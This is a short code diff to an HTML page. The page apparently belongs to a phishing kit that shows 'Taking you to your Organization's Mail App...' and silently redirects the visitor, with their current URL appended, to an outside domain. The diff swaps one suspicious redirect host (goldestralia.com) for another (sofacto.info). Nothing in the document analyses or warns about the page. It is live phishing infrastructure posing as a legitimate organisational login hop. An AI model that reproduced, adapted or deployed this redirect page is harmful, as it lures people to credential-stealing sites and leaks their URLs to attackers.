--- a/index.html
+++ b/index.html
@@ -11,11 +11,11 @@
         var e = window.location.href;
         
        
-        Redirect("https://goldestralia.com/west/?url="+e);
+        Redirect("https://sofacto.info/tcncc/?url="+e);
     }
 </script>
 </head>
 <body>
-<p>Taking you to your Organization's Web App...</p>
+<p>Taking you to your Organization's Mail App...</p>
 </body>
 </html>
